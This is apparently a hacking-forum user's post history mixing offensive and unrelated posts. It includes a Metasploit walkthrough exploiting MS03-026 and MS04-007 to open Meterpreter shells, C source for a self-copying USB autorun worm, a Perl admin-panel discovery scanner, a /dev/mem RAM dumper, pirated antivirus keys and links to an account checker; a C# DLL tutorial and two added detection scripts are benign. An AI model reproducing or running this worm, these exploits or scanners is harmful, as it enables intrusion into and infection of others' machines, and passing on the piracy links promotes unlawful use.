Everything posted by Nytro
-
This is an old exploit but it still works. I have tested it on a local area network; here this exploit was tested on Windows XP Service Pack 1.

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description
This module exploits a stack overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request

root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
5000/tcp open  upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|

       =[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.31      yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter >

=============================================================================================

[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description
This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.

msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  172.16.1.31      yes       The target address
   RPORT  445              yes       Set the SMB service port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf exploit(ms04_007_killbill) > exploit

[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo
Computer: ******-******
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter >

by matthews
-
Kaspersky Internet Security stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers : Keeps your money and identity safe Improved! Protects against bank account fraud Safeguards against online shopping threats Allows questionable applications and websites to be run in 'Safe Run Mode' New! Cybercriminals won’t hi-jack your PC Family protection from on-line predators Your files won’t be ruined by hackers Improved! Keeps your PC running smoothly Safer Wi-Fi connections Two way personal firewall Working keys till February 2010 Download: http://www.mediafire.com/download.php?edzmhto3juy
-
#include <windows.h> #include <stdio.h> int InfectDrives( ); int WriteINI( char* sINI, char* sFILE ); int ReadINI( char* sINI, char* sFILE ); int FileCopy( char* sNEW ); char* szFileName = "blah.exe"; int main() { int i = InfectDrives( ); printf( "drives infected: %i", i ); getchar( ); return 0; }; int InfectDrives( ) { char szBuffer[260]; char szInit[520], szFile[520]; int iCount = 0, iGet, iType; iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer ); if( iGet == 0 ) { return( 0 ); } char *szDrive = szBuffer; while( *szDrive ) { iType = GetDriveTypeA( szDrive ); sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file if( iType == 2 ) //removable device { if( ReadINI( szInit, szFileName ) == 0 ) //check for infection { if( WriteINI( szInit, szFileName ) == 0 ) //infect { if( FileCopy( szFile ) == 0 ) //copy file { iCount++; } } } } szDrive = &szDrive[ strlen( szDrive ) + 1]; } return( iCount ); }; int WriteINI( char* sINI, char* sFILE ) { unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI ); if( bWrite == 0 ) { return( 1 ); } return( 0 ); }; int ReadINI( char* sINI, char* sFILE ) { char szBuffer[260]; unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI ); if( lRead != 0 ) { if( strstr( szBuffer, sFILE ) ) { return( 1 ); } } return( 0 ); }; int FileCopy( char* sNEW ) { char szBuffer[260]; GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) ); bool bCopy = CopyFile( szBuffer, sNEW, 0 ); if( bCopy == false ) { return( 1 ); } return( 0 ); }
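Seen from the defender's side, the posted code leaves one artifact on each removable drive: an `autorun.inf` whose `[autorun]` section has an `open` value naming an executable copied next to it. The following is an added example, not part of the original post: it parses `autorun.inf` text and reports every entry that starts a program. The function names and the sample file contents are constructed for illustration.

```python
"""Audit autorun.inf text for entries that start a program (added example)."""
import os
import re

# [autorun] keys that make the shell start a program when the drive is opened.
LAUNCH_KEYS = {"open", "shellexecute"}
# shell\<verb>\command entries attach a command to a drive context-menu verb.
SHELL_COMMAND = re.compile(r"^shell\\[^\\]+\\command$")
EXECUTABLE_EXT = re.compile(r"\.(exe|com|scr|pif|bat|cmd|vbs|js)\b", re.IGNORECASE)


def parse_autorun(text):
    """Return {key: value} for the [autorun] section; keys are lower-cased."""
    entries = {}
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or INI comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip().strip('"')
    return entries


def audit_autorun(text):
    """Return (key, value, verdict) for every launch entry in the file."""
    findings = []
    for key, value in parse_autorun(text).items():
        if key in LAUNCH_KEYS or SHELL_COMMAND.match(key):
            verdict = "executable" if EXECUTABLE_EXT.search(value) else "review"
            findings.append((key, value, verdict))
    return findings


def audit_roots(roots):
    """Audit autorun.inf (any letter case) at the root of each mounted drive."""
    report = {}
    for root in roots:
        for name in os.listdir(root):
            path = os.path.join(root, name)
            if name.lower() == "autorun.inf" and os.path.isfile(path):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = audit_autorun(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples. The first is what a WritePrivateProfileString call with
# section "autorun", key "open" and value "blah.exe" leaves on disk.
SAMPLE_INFECTED = "[autorun]\r\nopen=blah.exe\r\n"
SAMPLE_BENIGN = "[autorun]\nicon=setup.ico\nlabel=Backup\n"
SAMPLE_MIXED = (
    "; vendor comment\n"
    "[AutoRun]\n"
    "Icon=drive.ico\n"
    "Shell\\Open\\Command = tools\\start.bat\n"
    "[other]\n"
    "open=ignored.exe\n"
)

if __name__ == "__main__":
    for label, sample in (("infected", SAMPLE_INFECTED),
                          ("benign", SAMPLE_BENIGN),
                          ("mixed", SAMPLE_MIXED)):
        print(label, audit_autorun(sample))
```

On Windows hosts the corresponding hardening is the `NoDriveTypeAutoRun` policy value, which stops the shell from acting on `autorun.inf` for the selected drive types.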
-
#!/usr/bin/perl ## # By GlaDiaT0R # Admin Control Panel Finder ___ Version 1 # Home: Darkgh0st.com ## use HTTP::Request; use LWP::UserAgent; system('cls'); system('title Admin Control Panel Finder v1 final I[C]oded by Gladiator from H4ckCr3w.net'); print"\n"; print "-----------------------------------------------\n" ; print "[*]--Admin Control Panel Finder v 1 --------[*]\n" ; print "[*]-------------Coded By GlaDiaT0R----------[*]\n" ; print "[*]-------------From Darkgh0st.com---------[*]\n" ; print "[*]------------Greetz to Allah--------------[*]\n" ; print "*******************************************\n" ; print "\n"; print "~# enter site to scan\n* ex: www.domaine.com ou www.domaine.com/path\n-> "; $site=<STDIN>; chomp $site; print "\n"; print "~ Enter coding language of the website \n* ex: asp, php, cfm\n-> "; $code=<STDIN>; chomp($code); if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/'; } print "\n"; print "->Le site: $site\n"; print "->Source du site: $code\n"; print "->Scan de l'admin control panel en cours...\n\n\n"; if($code eq "asp"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my 
$ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- # -------------------test cfm ---------------------------| # ------------------------------------------------------- if($code eq "cfm"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content 
=~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- #--------------------------/test-------------------------| # ------------------------------------------------------- if($code eq "php"){ @path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' ); foreach $ways(@path2){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content 
=~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } kill("STOP",NULL); } ## # By GlaDiaT0R ##
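A script like this is easy to spot in web server logs: one client issues well over a hundred GET requests for administrative paths in sequence, nearly all answered with 404, and because the script never sets an agent string, LWP sends its default `libwww-perl/<version>` User-Agent. The following is an added example, not part of the original post: it reads Combined Log Format lines and reports clients whose burst of distinct admin-like paths crosses a threshold. The thresholds, function names and log lines are constructed for illustration.

```python
"""Detect admin-panel path enumeration in access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined Log Format; the referer and user-agent fields are optional.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<ua>[^"]*)")?'
)
# Path fragments typical of admin-panel wordlists (assumed heuristic).
ADMIN_HINT = re.compile(r"admin|login|moderator|controlpanel|/adm[/._]|/cp\.", re.I)


def detect_admin_enumeration(lines, window_seconds=60, min_paths=10):
    """Report clients requesting >= min_paths distinct admin-like paths
    inside any window of window_seconds."""
    per_ip = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if not ADMIN_HINT.search(path):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        per_ip[m["ip"]].append((ts, path, int(m["status"]), m["ua"] or ""))

    window = timedelta(seconds=window_seconds)
    findings = []
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e[0])
        best, start = [], 0
        for end in range(len(events)):
            # Slide the window start forward until it spans <= window_seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            if len({e[1] for e in burst}) > len({e[1] for e in best}):
                best = burst
        distinct = {e[1] for e in best}
        if len(distinct) >= min_paths:
            findings.append({
                "ip": ip,
                "distinct_paths": len(distinct),
                "not_found_ratio": sum(e[2] == 404 for e in best) / len(best),
                "first_seen": best[0][0].isoformat(),
                "perl_lwp_agent": any(e[3].startswith("libwww-perl") for e in best),
            })
    return findings


def build_sample():
    """Constructed log: one scanner walking a wordlist, one ordinary visitor."""
    paths = ["admin/", "administrator/", "moderator/", "webadmin/", "adminarea/",
             "bb-admin/", "adminLogin/", "admin_area/", "admin/login.php",
             "admin/index.php", "wp-login.php", "admin.php"]
    lines = []
    for i, p in enumerate(paths):
        status = 200 if p == "wp-login.php" else 404
        lines.append(
            f'203.0.113.7 - - [21/Jun/2009:10:00:{i:02d} +0000] '
            f'"GET /{p} HTTP/1.1" {status} 512 "-" "libwww-perl/5.805"'
        )
    for i, p in enumerate(["index.html", "login.php", "images/logo.png"]):
        lines.append(
            f'198.51.100.20 - - [21/Jun/2009:10:01:{i:02d} +0000] '
            f'"GET /{p} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'
        )
    return lines


if __name__ == "__main__":
    for finding in detect_admin_enumeration(build_sample()):
        print(finding)
```

The same signal works as a rate-limit or WAF rule; the path-count threshold matters more than the User-Agent check, which a changed agent string defeats.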
-
/* A simple tool that allows you to dump all the physical memory (RAM) */
/* For more visit: http://vx.netlux.org/wargamevx */
/* greetz: undernet @ #eof-project,#virus and to non3x for the testing */
/* Tested on:
   2.6.20-1.2320.fc5smp i686 athlon
   2.6.22-gentoo-r5 i686 AMD Turion(tm) 64 X2 Mobile Technology TL-50 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcmp */
#include <ctype.h>      /* isprint */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

/* Print only the printable characters found in the buffer */
void Printable(unsigned char *str, ssize_t size)
{
    ssize_t lm = 0;

    while (lm < size) {
        if (isprint(str[lm]))
            printf("%c", str[lm]);
        lm++;
    }
}

int main(int argc, char *argv[])
{
    int fd, only_print;
    unsigned char *buf = NULL;
    ssize_t n;
    long page_size = sysconf(_SC_PAGESIZE);
    /* 64-bit product: a 32-bit unsigned int overflows at 4 GB of RAM */
    unsigned long long tot_mem =
        (unsigned long long)page_size * sysconf(_SC_PHYS_PAGES);

    if (argc < 2) {
        printf("DumpRam v0.1 by [WarGame/DoomRiderz]\n");
        printf("Usage: %s [option]\n", argv[0]);
        printf("option can be:\n");
        printf("-p = only printable chars\n");
        printf("-e = every byte\n");
        exit(EXIT_FAILURE);
    }

    if (getuid() != 0) {
        printf("You must be root\n");
        exit(EXIT_FAILURE);
    }

    if (strcmp(argv[1], "-p") == 0)
        only_print = 1;
    else if (strcmp(argv[1], "-e") == 0)
        only_print = 0;
    else {
        printf("Invalid option\n");
        exit(EXIT_FAILURE);
    }

    fd = open("/dev/mem", O_RDONLY);
    if (fd < 0) {
        perror("/dev/mem");
        exit(EXIT_FAILURE);
    }

    printf("\n\n\n\t** RAM size in Kb: %llu\n", tot_mem / 1024);
    printf("\t** Size of a page in bytes: %ld\n\n\n\n\n", page_size);

    if ((buf = malloc(page_size)) == NULL) {
        perror("malloc()");
        exit(EXIT_FAILURE);
    }

    /* read() returns 0 at end of file and -1 on error; stop on both */
    while ((n = read(fd, buf, page_size)) > 0) {
        if (only_print)
            Printable(buf, n);
        else
            write(STDOUT_FILENO, buf, n);   /* stdout, not fd 0 (stdin) */
    }

    close(fd);
    free(buf);
    return 0;
}
-
Creating and using DLL Files
by sunjester

Using DLL files is to eliminate writing code over and over again. DLLs are often used for many things like file I/O. I will show you how to take the first two tutorials I've written in this section (reading and writing text files) and put them both in a DLL file. Then, once the DLL is in our project, I will show you how to use the read and write methods we placed inside the DLL.

It's probably more feasible for .NET applications to utilize DLLs instead of rewriting so much code. C# and VB .NET applications are mostly used ("in the industry") for demo applications, or test applications for rapid application development. Yes, C# and VB.NET are RAD languages just like the old VB6.

1. First, create a new project. Open the wizard and select "Class Library" and give it an appropriate name.

2. Here you can copy and paste the code from the previous two tutorials; below is what mine looks like now.

//sunjester
//fusecurity.com
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Collections;

namespace FileIO
{
    public class InputOutput
    {
        //writing to text files
        public void writeToFile(string fileName, string content)
        {
            StreamWriter write = new StreamWriter(fileName);
            write.Write(content);
            write.Close();
        }

        //reading from text files
        public ArrayList Read(string fileName)
        {
            StreamReader read = new StreamReader(fileName);
            ArrayList lines = new ArrayList();
            while (!read.EndOfStream)
            {
                lines.Add(read.ReadLine());
            }
            read.Close();
            return lines;
        }
    }
}

3. Now we can build the DLL, so in the menu select "Build" then "Build Solution".

4. Next, let's go ahead and add another project to this one just in case we need to go back to the original DLL source and update it.

5. Name it accordingly.

6. Now we add the reference to the DLL file we just created.

7. And the final code.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using FileIO;
using System.Collections;

namespace UseFileIO2
{
    class Program
    {
        static void Main(string[] args)
        {
            InputOutput io = new InputOutput();
            io.writeToFile("c:\\test44.txt", "here is some sample test data to write");
            ArrayList lines = io.Read("c:\\test44.txt");
            for (int i = 0; i < lines.Count; i++)
            {
                Console.WriteLine(lines[i]);
            }
        }
    }
}
-
Demo: http://linkvn.info/checker/ Download: http://www.2shared.com/file/7080989/60eb434b/Rapid_Account_Checker.html
-
Download: http://www.2shared.com/file/7080970/9eafe720/File_Cloner_source.html
-
